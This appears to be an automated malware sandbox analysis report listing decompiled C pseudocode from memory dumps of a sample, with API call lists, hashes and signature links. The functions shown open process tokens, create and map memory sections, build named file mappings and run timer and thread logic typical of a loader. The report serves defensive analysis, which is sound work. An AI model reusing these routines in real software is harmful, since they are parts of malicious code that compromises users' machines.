HeapFree.KERNEL32(00000000,00000000), ref: 03294536

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: db7be72b65f447fd1615bf2e09a5be436d13264b88ac20fbfb0e332ac91891c6
Instruction ID: b8c0bb1df62e863bcc725398a65b771d810889faff7cb604b986434dda00a5bb
Opcode Fuzzy Hash: db7be72b65f447fd1615bf2e09a5be436d13264b88ac20fbfb0e332ac91891c6
Instruction Fuzzy Hash: 80315E71A1030AEFEB11EFA5ED84B6EB7F9FF48210F15846AE505D7210DB31DA519B10

Uniqueness

Uniqueness Score: -1.00%

Function 03292D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E03292D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E03296837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E032950CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x03292d13
0x03292d14
0x03292d15
0x03292d16
0x03292d17
0x03292d1b
0x03292d22
0x03292d31
0x03292d34
0x03292d37
0x03292d3e
0x03292d41
0x03292d44
0x03292d47
0x03292d4a
0x03292d55
0x03292d57
0x03292d60
0x03292d68
0x03292d6a
0x03292d7c
0x03292d86
0x03292d8a
0x03292d99
0x03292d9d
0x03292da6
0x03292dae
0x03292dae
0x03292db0
0x03292db0
0x03292db8
0x03292dbe
0x03292dc2
0x03292dc2
0x03292dcd

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 03292D4D
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 03292D60
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 03292D7C

Part of subcall function 03296837: RtlAllocateHeap.NTDLL(00000000,00000000,03294197), ref: 03296843

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 03292D99
memcpy.NTDLL(00000000,00000000,0000001C), ref: 03292DA6
NtClose.NTDLL(00000000), ref: 03292DB8
NtClose.NTDLL(00000000), ref: 03292DC2

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 243353f64a3af1a40ebf48910ee9c5bb839bcaad06aed81267d00c7cbc311f9d
Instruction ID: b52aa405832d239eb98bdd90b905f4b873f76fd5d0b371ace23facf7b9129c93
Opcode Fuzzy Hash: 243353f64a3af1a40ebf48910ee9c5bb839bcaad06aed81267d00c7cbc311f9d
Instruction Fuzzy Hash: 2B21F4B6910218BBEF01EF94DC49DDEBFBDFF08B60F104066F904A6154D7B18A849BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F45A90, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1084COMMON

Download Yara Rule

Strings

I#, xrefs: 02F4647A
#, xrefs: 02F46649

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID:
String ID: #$I#
API String ID: 0-3815891943
Opcode ID: bc9478253fd28468ced62d0a0bf575678feceac2896f064322e8bafa18164db4
Instruction ID: 2c0ba2eb59a521563b1e38f8411e44b65d0541b9bb8f0adf185c5993348dd559
Opcode Fuzzy Hash: bc9478253fd28468ced62d0a0bf575678feceac2896f064322e8bafa18164db4
Instruction Fuzzy Hash: F9A2EE72D84259CBC728CF28E980274FBB6A754FCCB0548AEC6458B270D770956DDF92

Uniqueness

Uniqueness Score: -1.00%

Function 02F11B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E02F11B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E02F11EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x02f11ba5
0x02f11bac
0x02f11bad
0x02f11bae
0x02f11baf
0x02f11bb0
0x02f11bc1
0x02f11bc5
0x02f11bd9
0x02f11bdc
0x02f11bdf
0x02f11be6
0x02f11be9
0x02f11bf0
0x02f11bf3
0x02f11bf6
0x02f11bf9
0x02f11bfe
0x02f11c39
0x02f11c00
0x02f11c03
0x02f11c09
0x02f11c0e
0x02f11c12
0x02f11c30
0x02f11c14
0x02f11c1b
0x02f11c29
0x02f11c29
0x02f11c12
0x02f11c41

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 02F11BF9

Part of subcall function 02F11EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,02F11C0E,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,02F11C0E,?), ref: 02F11EF4

memset.NTDLL ref: 02F11C1B

Strings

@, xrefs: 02F11BE9

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction ID: 2a444a1230550f67fb2c8ca77114c1c8d78b76a9f742f6fc900e6d42cb048db7
Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction Fuzzy Hash: DB210BB2D0020DAFCB11DFA9C8849EFFBB9EB48354F504829E615F3210D735AA458F64

Uniqueness

Uniqueness Score: -1.00%

Function 02F11EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02F11EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x02f11ed9
0x02f11edf
0x02f11eed
0x02f11ef4
0x02f11ef9
0x02f11eff
0x00000000
0x02f11f00
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,02F11C0E,00000000,00000000,?,?,00000002,00000000,?,?,00000000,?,02F11C0E,?), ref: 02F11EF4

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: de8c479b9f61e08299e467151556f1514cd60b6a8970c7d76c93531be4b57474
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 40F030B690420CFFEB119FA5CC85CAFBBBDEB44394B104939F652E1090D671AE088B60

Uniqueness

Uniqueness Score: -1.00%

Function 03292022, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E03292022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x329a298);
					_v20 = 0;
					_v16 = 0;
					L03297D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x329a2c4; // 0x324
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0 || E03291AB8(_t74) != 0) {
							 *0x329a2a4 = 5;
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x329a2b8 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t72 = _v12;
						_t58 = _t72 << 4;
						_t76 = _t80 + (_t72 << 4) - 0x54;
						_t73 = _t72 + 1;
						_v24 = _t72 + 1;
						_t61 = E03295F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16);
						_v8.LowPart = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v24;
						_t90 = _t66 - 3;
						_v12 = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E03293032(_t73, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x329a29c);
							goto L21;
						} else {
							__eflags =  *0x329a2a0; // 0xa
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E03291492();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x329a2a0);
								L21:
								L03297D8C();
								_v36.LowPart = _t61;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t65;
								_v8.LowPart = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t71 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x329a290, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t71 = _t71 - 1;
					} while (_t71 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x03292022
0x03292034
0x03292037
0x03292043
0x0329204b
0x0329204e
0x032921b4
0x03292054
0x03292054
0x03292056
0x0329205b
0x0329205c
0x03292062
0x03292065
0x03292068
0x03292076
0x03292081
0x03292084
0x03292086
0x03292093
0x0329209d
0x032920a1
0x032920a4
0x032920a9
0x032920b4
0x032920b4
0x032920be
0x00000000
0x032920c1
0x032920c5
0x032920d0
0x032920d0
0x032920d7
0x032920dc
0x032920e3
0x032920ec
0x032920f2
0x032920f5
0x032920fc
0x032920ff
0x00000000
0x00000000
0x03292101
0x03292104
0x03292107
0x0329210a
0x00000000
0x0329210c
0x0329211b
0x0329211b
0x00000000
0x03292149
0x03292149
0x0329214e
0x0329216d
0x0329216f
0x03292174
0x03292175
0x00000000
0x03292150
0x03292150
0x03292156
0x00000000
0x03292158
0x03292158
0x0329215d
0x0329215f
0x03292164
0x03292165
0x0329217b
0x0329217b
0x03292183
0x0329218e
0x03292191
0x0329219c
0x0329219e
0x032921a0
0x032921a3
0x00000000
0x032921a9
0x00000000
0x032921a9
0x032921a3
0x03292156
0x00000000
0x0329214e
0x0329211e
0x03292120
0x03292123
0x03292124
0x03292124
0x03292128
0x03292132
0x03292132
0x03292138
0x0329213b
0x0329213b
0x03292141
0x03292141
0x032921be
0x00000000

APIs

memset.NTDLL ref: 03292037
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 03292043
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 03292068
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 03292084
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0329209D
HeapFree.KERNEL32(00000000,00000000), ref: 03292132
CloseHandle.KERNEL32(?), ref: 03292141
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0329217B
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0329560C), ref: 03292191
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0329219C

Part of subcall function 03291AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,053E9340,?,00000000,30314549,00000014,004F0053,053E92FC), ref: 03291BA4
Part of subcall function 03291AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,032920B0), ref: 03291BB6

GetLastError.KERNEL32 ref: 032921AE

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: fd49afa3c94d508dcf98b44e604995ad6efc84576993386352c53f02300a2eeb
Instruction ID: 238fefb081249ed8adefb0077e61aeb0ec21922fec9071cf3118cc11ceb41917
Opcode Fuzzy Hash: fd49afa3c94d508dcf98b44e604995ad6efc84576993386352c53f02300a2eeb
Instruction Fuzzy Hash: A2513875811329FAEF11EF95EC489EEBBBCEF09720F24851BE514E6184D7718690CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F11C7D, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E02F11C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E02F11F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E02F118AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E02F11ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E02F113D1(E02F114E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E02F1134F(_t45,  &_v48) != 0) {
					 *0x2f141b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x2f141b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E02F11B58(_t50 + _t15);
				 *0x2f141b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E02F1142F(_t44);
					goto L11;
				}
			}

0x02f11c89
0x02f11c92
0x02f11c96
0x02f11d9e
0x02f11da4
0x00000000
0x00000000
0x00000000
0x02f11c9c
0x02f11c9c
0x02f11ca1
0x02f11ca7
0x02f11cb6
0x02f11cb7
0x02f11cba
0x02f11cbd
0x02f11cc6
0x02f11cca
0x02f11cd0
0x02f11cd4
0x02f11cdb
0x00000000
0x00000000
0x02f11ce1
0x02f11ce8
0x02f11cec
0x02f11d8f
0x02f11d8f
0x02f11d96
0x02f11d98
0x02f11d98
0x00000000
0x02f11d96
0x02f11cf5
0x02f11d48
0x02f11d48
0x02f11d59
0x02f11d5d
0x02f11d8b
0x02f11d5f
0x02f11d62
0x02f11d6a
0x02f11d6e
0x02f11d76
0x02f11d76
0x02f11d7d
0x02f11d7d
0x00000000
0x02f11d5d
0x02f11d03
0x02f11d42
0x00000000
0x02f11d42
0x02f11d05
0x02f11d09
0x02f11d12
0x02f11d14
0x02f11d18
0x02f11d3a
0x02f11d3a
0x00000000
0x02f11d3a
0x02f11d1a
0x02f11d1f
0x02f11d26
0x02f11d2b
0x00000000
0x02f11d2d
0x02f11d30
0x02f11d33
0x00000000
0x02f11d33

APIs

Part of subcall function 02F11F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,02F11C8E,74B063F0,00000000), ref: 02F11F1F
Part of subcall function 02F11F10: GetVersion.KERNEL32 ref: 02F11F2E
Part of subcall function 02F11F10: GetCurrentProcessId.KERNEL32 ref: 02F11F3D
Part of subcall function 02F11F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02F11F56

GetSystemTime.KERNEL32(?,74B063F0,00000000), ref: 02F11CA1
SwitchToThread.KERNEL32 ref: 02F11CA7

Part of subcall function 02F118AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 02F11903
Part of subcall function 02F118AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 02F119C9

Sleep.KERNELBASE(00000000,00000000), ref: 02F11CCA
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 02F11D12
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 02F11D30
WaitForSingleObject.KERNEL32(00000000,000000FF,02F114E8,?,00000000), ref: 02F11D62
GetExitCodeThread.KERNEL32(00000000,?), ref: 02F11D76
CloseHandle.KERNEL32(00000000), ref: 02F11D7D
GetLastError.KERNEL32(02F114E8,?,00000000), ref: 02F11D85
GetLastError.KERNEL32 ref: 02F11D98

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: a8468bc825754f576003684ab269f4e490830c84327c9cb3287e821bc15f137f
Instruction ID: 17b2d74c5fbd3c9420b429c75566b741150bb90ffec9563f74d0a55edbeb8c52
Opcode Fuzzy Hash: a8468bc825754f576003684ab269f4e490830c84327c9cb3287e821bc15f137f
Instruction Fuzzy Hash: 63318171D043199B8721EF659C48A6FB7EDAB857D4B810E1AFB59D2140EB30C510CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02F11144, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E02F11144(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L02F12210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x2f141d0;
				_push(_t15 + 0x2f1505e);
				_push(_t15 + 0x2f15054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L02F1220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x2f141c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x02f11144
0x02f1114d
0x02f11151
0x02f11157
0x02f1115c
0x02f11161
0x02f11164
0x02f11167
0x02f1116c
0x02f1116d
0x02f11170
0x02f1117b
0x02f11182
0x02f11186
0x02f11188
0x02f11189
0x02f1118c
0x02f11191
0x02f1119b
0x02f1119d
0x02f1119d
0x02f111b1
0x02f111b7
0x02f111bb
0x02f1120b
0x02f111bd
0x02f111c6
0x02f111dc
0x02f111e4
0x02f111f6
0x02f111fa
0x00000000
0x00000000
0x02f111e6
0x02f111e9
0x02f111ee
0x02f111f0
0x02f111f0
0x02f111d1
0x02f111d3
0x02f111fc
0x02f111fd
0x02f111fd
0x02f111c6
0x02f11213

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 02F11151
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02F11167
_snwprintf.NTDLL ref: 02F1118C
CreateFileMappingW.KERNELBASE(000000FF,02F141C0,00000004,00000000,?,?), ref: 02F111B1
GetLastError.KERNEL32 ref: 02F111C8
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02F111DC
GetLastError.KERNEL32 ref: 02F111F4
CloseHandle.KERNEL32(00000000), ref: 02F111FD
GetLastError.KERNEL32 ref: 02F11205

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: af3f7e00e0c57dec80134bac1ba984e4cdfbabaee343469c4b807c09f516be1d
Instruction ID: 3c3bd48e63e65267dd63768f3b113807e34120377db600656e9a63ea8a3bf969
Opcode Fuzzy Hash: af3f7e00e0c57dec80134bac1ba984e4cdfbabaee343469c4b807c09f516be1d
Instruction Fuzzy Hash: 7121D3B2E4010CBFEB10AF98DC88E9EB7ADEB483D4F924565FB19E7140D6309904CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03296384, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E03296384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L03297D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x329a2d4; // 0x214d5a8
				_t5 = _t13 + 0x329b8a2; // 0x53e8e4a
				_t6 = _t13 + 0x329b57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L03297A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0x329a2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x03296384
0x0329638c
0x03296390
0x03296396
0x0329639b
0x032963a0
0x032963a3
0x032963a6
0x032963ab
0x032963ac
0x032963af
0x032963b4
0x032963bb
0x032963c5
0x032963c7
0x032963c8
0x032963cb
0x032963e7
0x032963ed
0x032963f1
0x0329643f
0x032963f3
0x03296400
0x03296410
0x03296418
0x0329642a
0x0329642e
0x00000000
0x00000000
0x0329641a
0x0329641d
0x03296422
0x03296424
0x03296424
0x03296402
0x03296404
0x03296430
0x03296431
0x03296431
0x03296400
0x03296446

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,03295488,?,00000001,?), ref: 03296390
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 032963A6
_snwprintf.NTDLL ref: 032963CB
CreateFileMappingW.KERNELBASE(000000FF,0329A2F8,00000004,00000000,00001000,?), ref: 032963E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,03295488,?), ref: 032963F9
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 03296410
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,03295488), ref: 03296431
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,03295488,?), ref: 03296439

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
